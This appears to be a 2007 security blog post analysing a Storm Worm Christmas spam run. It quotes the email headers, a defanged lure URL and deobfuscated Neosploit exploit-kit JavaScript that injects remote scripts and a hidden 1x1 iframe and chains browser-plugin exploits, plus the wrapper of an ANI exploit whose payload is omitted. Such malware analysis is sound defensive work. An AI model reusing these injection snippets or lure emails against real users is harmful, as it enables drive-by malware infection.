Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!
We just received a handful of these in our mail drops. Looks like the grinch still runs storm.
Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
hey,
I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/
Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100
In place of MerryChristmasDude you could use ltbrew, tibeam, etc.
JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:
So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...
var script = document.createElement("script");
script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");
document.body.appendChild(script);
It took two passes, but JSDecode did its job:
....snip...
...snip...function startANI()
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = 'iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"'
return 0;
}
if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]
Once ran in the Sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.
Same old storm, binary changes every few seconds, and someone's going to fall for it.
Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)
Labels: CME711, javascript, metasploit, neosploit, peacomm, peed, Storm
posted by Nicholas at
01:54
2 Comments
